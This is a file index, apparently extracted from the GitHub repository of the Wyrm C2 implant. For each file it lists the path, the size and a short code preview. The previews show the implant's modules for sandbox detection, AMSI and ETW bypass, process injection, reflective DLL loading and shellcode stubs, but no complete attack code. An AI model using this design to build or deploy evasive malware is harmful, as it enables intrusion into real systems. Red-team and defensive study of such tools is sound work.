    "path": "implant/src/anti_sandbox/mod.rs",
    "chars": 1426,
    "preview": "mod memory;\nmod trig;\n\n/// This function takes care of anti-sandbox analysis, and depending upon the sandbox checks perf"
  },
  {
    "path": "implant/src/anti_sandbox/trig.rs",
    "chars": 3898,
    "preview": "//! A trigonometric approach to detect human behaviour on an endpoint as seen by\n//! LummaC2 https://outpost24.com/blog/"
  },
  {
    "path": "implant/src/comms.rs",
    "chars": 11896,
    "preview": "//! Implant communications are handled here.\n\nuse std::{fs::File, mem::take, path::Path};\n\nuse crate::{\n    utils::{\n   "
  },
  {
    "path": "implant/src/entry.rs",
    "chars": 3654,
    "preview": "//! Entry module for kicking off the implant, whether from a DLL or an exe.\n\nuse core::{sync::atomic::AtomicBool, time::"
  },
  {
    "path": "implant/src/evasion/amsi.rs",
    "chars": 2930,
    "preview": "use std::ffi::c_void;\n\nuse str_crypter::{decrypt_string, sc};\nuse windows_sys::Win32::System::{\n    Diagnostics::Debug::"
  },
  {
    "path": "implant/src/evasion/etw.rs",
    "chars": 1460,
    "preview": "use std::ffi::c_void;\n\nuse shared_no_std::export_resolver;\nuse shared_no_std::export_resolver::ExportResolveError;\nuse s"
  },
  {
    "path": "implant/src/evasion/mod.rs",
    "chars": 385,
    "preview": "use crate::evasion::etw::etw_bypass;\n\npub mod amsi;\nmod etw;\nmod veh;\n\npub fn run_evasion() {\n    //\n    // Note these f"
  },
  {
    "path": "implant/src/evasion/veh.rs",
    "chars": 2689,
    "preview": "//! This module contains the vectored exception handler when abusing it for evasive purposes\n\nuse std::ffi::c_void;\n\nuse"
  },
  {
    "path": "implant/src/execute/dotnet.rs",
    "chars": 13382,
    "preview": "use core::{ffi::c_void, iter::once, mem::zeroed, ptr::null_mut};\n\nuse shared::{task_types::DotExDataForImplant, tasks::W"
  },
  {
    "path": "implant/src/execute/ffi.rs",
    "chars": 14628,
    "preview": "use std::ffi::{c_long, c_void};\n\nuse windows_sys::{\n    Win32::{\n        Foundation::HANDLE,\n        System::{Com::SAFEA"
  },
  {
    "path": "implant/src/execute/mod.rs",
    "chars": 25,
    "preview": "pub mod dotnet;\nmod ffi;\n"
  },
  {
    "path": "implant/src/lib.rs",
    "chars": 1035,
    "preview": "#![feature(string_remove_matches)]\n#![feature(core_float_math)]\n#![feature(const_option_ops)]\n#![feature(const_trait_imp"
  },
  {
    "path": "implant/src/main.rs",
    "chars": 446,
    "preview": "#![feature(string_remove_matches)]\n#![feature(core_float_math)]\n#![feature(const_option_ops)]\n#![feature(const_trait_imp"
  },
  {
    "path": "implant/src/main_svc.rs",
    "chars": 2481,
    "preview": "#![feature(string_remove_matches)]\n#![feature(core_float_math)]\n#![feature(const_option_ops)]\n#![feature(const_trait_imp"
  },
  {
    "path": "implant/src/native/Readme.md",
    "chars": 182,
    "preview": "# Native\n\nThis module clusters native interactions with the OS where the activity relates to implant\nactions; as opposed"
  },
  {
    "path": "implant/src/native/accounts.rs",
    "chars": 10910,
    "preview": "use std::{ffi::c_void, fmt::Display, mem::transmute, ptr::null_mut, slice::from_raw_parts};\n\nuse serde::Serialize;\nuse s"
  },
  {
    "path": "implant/src/native/filesystem.rs",
    "chars": 16043,
    "preview": "use std::{\n    fs::{self, File},\n    io::{self, Write},\n    path::{Path, PathBuf},\n};\n\nuse serde::Serialize;\nuse shared:"
  },
  {
    "path": "implant/src/native/mod.rs",
    "chars": 90,
    "preview": "pub mod accounts;\npub mod filesystem;\npub mod processes;\npub mod registry;\npub mod shell;\n"
  },
  {
    "path": "implant/src/native/processes.rs",
    "chars": 10067,
    "preview": "//! Native interactions with Windows Processes\n\nuse serde::Serialize;\nuse shared::{\n    stomped_structs::Process,\n    ta"
  },
  {
    "path": "implant/src/native/registry.rs",
    "chars": 13042,
    "preview": "use std::slice::from_raw_parts;\n\nuse serde::Serialize;\nuse shared::{\n    stomped_structs::RegQueryResult,\n    task_types"
  },
  {
    "path": "implant/src/native/shell.rs",
    "chars": 787,
    "preview": "use std::process::Command;\n\nuse serde::Serialize;\nuse shared::tasks::PowershellOutput;\n\nuse crate::wyrm::Wyrm;\n\npub fn r"
  },
  {
    "path": "implant/src/spawn_inject/early_cascade.rs",
    "chars": 8776,
    "preview": "use std::{ffi::c_void, ptr::null_mut};\n\nuse shared::tasks::WyrmResult;\nuse shared_no_std::{\n    export_resolver::{Export"
  },
  {
    "path": "implant/src/spawn_inject/injection.rs",
    "chars": 4079,
    "preview": "use std::{ffi::c_void, mem::transmute, ptr::null_mut};\n\nuse shared::tasks::WyrmResult;\nuse shared_no_std::export_resolve"
  },
  {
    "path": "implant/src/spawn_inject/mod.rs",
    "chars": 841,
    "preview": "//! A module for loading / injecting Wyrm into other / new processes.\n\nuse shared::tasks::WyrmResult;\n\nuse crate::spawn_"
  },
  {
    "path": "implant/src/stubs/mod.rs",
    "chars": 107,
    "preview": "//! A module containing publicly exported stubs that are 'context independent'\n\npub mod rdi;\npub mod shim;\n"
  },
  {
    "path": "implant/src/stubs/rdi.rs",
    "chars": 21319,
    "preview": "//! Reflective DLL injector for Wyrm.\n//!\n//! This assumes that the DLL is loaded into memory by a wrapper around us whi"
  },
  {
    "path": "implant/src/stubs/shim.rs",
    "chars": 2351,
    "preview": "//! This is a shellcode (no_std rust near enough == shellcode just not hand coded) stub in the rDLL for Early Cascade\n//"
  },
  {
    "path": "implant/src/utils/allocate.rs",
    "chars": 843,
    "preview": "use std::alloc::{GlobalAlloc, Layout};\nuse windows_sys::Win32::System::Memory::{\n    GetProcessHeap, HEAP_ZERO_MEMORY, H"
  },
  {
    "path": "implant/src/utils/comptime.rs",
    "chars": 3589,
    "preview": "use std::process::exit;\n\nuse str_crypter::{decrypt_string, sc};\n\nuse crate::utils::console::print_failed;\n\npub type Slee"
  },
  {
    "path": "implant/src/utils/console.rs",
    "chars": 4238,
    "preview": "use std::{\n    ffi::c_void,\n    fmt::Display,\n    ptr::null_mut,\n    sync::{\n        Mutex, Once, OnceLock,\n        atom"
  },
  {
    "path": "implant/src/utils/export_comptime.rs",
    "chars": 3674,
    "preview": "//! A module for creating either fake exports full of junk, or exports which\n//! lead to the running of the agent, custo"
  },
  {
    "path": "implant/src/utils/mod.rs",
    "chars": 170,
    "preview": "pub mod allocate;\npub mod comptime;\npub mod console;\npub mod export_comptime;\npub mod pe_stomp;\npub mod proxy;\npub mod s"
  },
  {
    "path": "implant/src/utils/pe_stomp.rs",
    "chars": 561,
    "preview": "/// Given an input mutable buffer, stomps the first 50 bytes at hte `MZ` point, and\n/// the \"This program cannot be run "
  },
  {
    "path": "implant/src/utils/proxy.rs",
    "chars": 10029,
    "preview": "use std::{ffi::c_void, iter::once, mem::zeroed, ptr::null_mut};\n\nuse windows_sys::Win32::{\n    Foundation::{GlobalFree, "
  },
  {
    "path": "implant/src/utils/strings.rs",
    "chars": 1794,
    "preview": "use std::slice::from_raw_parts;\n\nuse windows_sys::Win32::Foundation::MAX_PATH;\n\n/// Converts a WSTR to a String by the *"
  },
  {
    "path": "implant/src/utils/svc_controls.rs",
    "chars": 1599,
    "preview": "use std::{\n    ffi::c_void,\n    ptr::null_mut,\n    sync::atomic::{AtomicBool, AtomicPtr, Ordering},\n};\n\nuse windows_sys:"
  },
  {
    "path": "implant/src/utils/time_utils.rs",
    "chars": 273,
    "preview": "use windows_sys::Win32::System::SystemInformation::GetSystemTimeAsFileTime;\n\npub fn epoch_now() -> i64 {\n    unsafe {\n  "
  },
  {
    "path": "implant/src/wofs/mod.rs",
    "chars": 1348,
    "preview": "use std::{mem::transmute, ptr::null};\n\nuse shared::tasks::WyrmResult;\nuse str_crypter::{decrypt_string, sc};\n\ninclude!(c"
  },
  {
    "path": "implant/src/wyrm.rs",
    "chars": 27786,
    "preview": "//! Wyrm represents the state and structure of the implant itself, including any functions\n//! on the implant.\n\nuse std:"
  },
  {
    "path": "loader/.cargo/config.toml",
    "chars": 230,
    "preview": "[target.x86_64-pc-windows-msvc]\nrustflags = [\n    \"-Z\", \"location-detail=none\",\n    \"-C\", \"panic=abort\",\n    \"-C\", \"targ"
  },
  {
    "path": "loader/Cargo.toml",
    "chars": 886,
    "preview": "[package]\nname = \"loader\"\nversion = \"0.1.0\"\nedition = \"2024\"\nbuild = \"build.rs\"\n\n[profile.release]\nopt-level = \"z\"\nlto ="
  },
  {
    "path": "loader/build.rs",
    "chars": 3797,
    "preview": "use std::{\n    env,\n    fmt::Write,\n    fs::{self, File},\n    io::Read,\n    path::{Path, PathBuf},\n};\n\nconst ENCRYPTION_"
  },
  {
    "path": "loader/src/export_comptime.rs",
    "chars": 3550,
    "preview": "//! A module for creating either fake exports full of junk, or exports which\n//! lead to the running of the agent, custo"
  },
  {
    "path": "loader/src/injector.rs",
    "chars": 4833,
    "preview": "use core::{\n    ffi::{CStr, c_void},\n    mem::transmute,\n    ptr::{copy_nonoverlapping, null_mut, read_unaligned},\n};\n\nu"
  },
  {
    "path": "loader/src/lib.rs",
    "chars": 611,
    "preview": "#![no_std]\n#![no_main]\n\nuse windows_sys::Win32::{Foundation::HINSTANCE, System::SystemServices::DLL_PROCESS_ATTACH};\n\nus"
  },
  {
    "path": "loader/src/main.rs",
    "chars": 307,
    "preview": "#![no_std]\n#![no_main]\n\nuse crate::injector::inject_current_process;\n\nmod injector;\nmod utils;\n\n#[cfg_attr(not(test), pa"
  },
  {
    "path": "loader/src/main_svc.rs",
    "chars": 2843,
    "preview": "#![no_std]\n#![no_main]\n#![cfg_attr(not(test), windows_subsystem = \"windows\")]\n#![no_main]\n\nuse crate::injector::inject_c"
  },
  {
    "path": "loader/src/utils.rs",
    "chars": 1419,
    "preview": "use windows_sys::Win32::Foundation::MAX_PATH;\n\n/// Generates a safe system `Global` mutex name given an input string.\n//"
  },
  {
    "path": "nginx/nginx.conf",
    "chars": 1913,
    "preview": "worker_processes  1;\n\nevents {\n    worker_connections 1024;\n}\n\nhttp {\n  server {\n    listen 80;\n    server_name localhos"
  },
  {
    "path": "resources/.$wyrm_staging.drawio.bkp",
    "chars": 7039,
    "preview": "<mxfile host=\"Electron\" agent=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) draw.io/"
  },
  {
    "path": "resources/wyrm.excalidraw",
    "chars": 49991,
    "preview": "{\n  \"type\": \"excalidraw\",\n  \"version\": 2,\n  \"source\": \"https://excalidraw.com\",\n  \"elements\": [\n    {\n      \"id\": \"Sz3dK"
  },
  {
    "path": "shared/Cargo.toml",
    "chars": 320,
    "preview": "[package]\nname = \"shared\"\nversion = \"0.1.0\"\nedition = \"2024\"\n\n[dependencies]\nserde = {version = \"1.0\", features = [\"deri"
  },
  {
    "path": "shared/readme.md",
    "chars": 331,
    "preview": "# Shared\n\nThis crate holds shared types, implementations, and logic which are shared across multiple crates,\nbut importa"
  },
  {
    "path": "shared/src/lib.rs",
    "chars": 396,
    "preview": "use serde::{Deserialize, Serialize};\n\npub mod net;\npub mod stomped_structs;\npub mod task_types;\npub mod tasks;\n\n#[derive"
  },
  {
    "path": "shared/src/net.rs",
    "chars": 3425,
    "preview": "use serde::{Deserialize, Serialize};\n\nuse crate::tasks::{Command, Task};\n\nconst NET_XOR_KEY: u8 = 0x3d;\npub const STR_CR"
  },
  {
    "path": "shared/src/stomped_structs.rs",
    "chars": 2496,
    "preview": "//! This module provides structs which have had their serilisation names stomped for evasion purposes, primarily\n//! the"
  },
  {
    "path": "shared/src/task_types.rs",
    "chars": 1049,
    "preview": "use serde::{Deserialize, Serialize};\n\n/// The inner type for the [`AdminCommand::Copy`] and [`AdminCommand::Move`], repr"
  },
  {
    "path": "shared/src/tasks.rs",
    "chars": 18140,
    "preview": "use core::panic;\nuse serde::{Deserialize, Serialize};\nuse std::{\n    collections::{BTreeMap, HashSet},\n    fmt::{Debug, "
  },
  {
    "path": "shared_c2_client/Cargo.toml",
    "chars": 362,
    "preview": "[package]\nname = \"shared_c2_client\"\nversion = \"0.1.0\"\nedition = \"2024\"\n\n[dependencies]\nserde = {version = \"1.0\", feature"
  },
  {
    "path": "shared_c2_client/readme.md",
    "chars": 235,
    "preview": "# shared_c2_client\n\nThis is a shared library for use between the C2 and the Client which requires certain\nfeatures which"
  },
  {
    "path": "shared_c2_client/src/lib.rs",
    "chars": 9306,
    "preview": "use serde::{Deserialize, Serialize};\nuse serde_json::Value;\nuse shared::tasks::{Command, Task};\nuse sqlx::FromRow;\n\npub "
  },
  {
    "path": "shared_no_std/Cargo.toml",
    "chars": 363,
    "preview": "[package]\nname = \"shared_no_std\"\nversion = \"0.1.0\"\nedition = \"2024\"\n\n[dependencies]\nwindows-sys = {version = \"0.61\", fea"
  },
  {
    "path": "shared_no_std/src/export_resolver.rs",
    "chars": 14110,
    "preview": "//! Export resolver is a local copy of my https://github.com/0xflux/PE-Export-Resolver crate.\n//! Currently the module c"
  },
  {
    "path": "shared_no_std/src/lib.rs",
    "chars": 53,
    "preview": "#![no_std]\n\npub mod export_resolver;\npub mod memory;\n"
  },
  {
    "path": "shared_no_std/src/memory.rs",
    "chars": 5394,
    "preview": "use core::{ffi::c_void, ptr::read_unaligned, slice::from_raw_parts};\n\nuse crate::export_resolver;\n\n/// Byte pattern foun"
  },
  {
    "path": "wofs_static/Readme.md",
    "chars": 8426,
    "preview": "# Static WOFs\n\nWOFs (Wyrm Object Files) are small, self-contained code modules that are baked into the implant at compil"
  }
]

About this extraction

This page contains the full source code of the 0xflux/Wyrm GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 171 files (693.8 KB), approximately 178.5k tokens, and a symbol index with 627 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.

Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.

Copied to clipboard!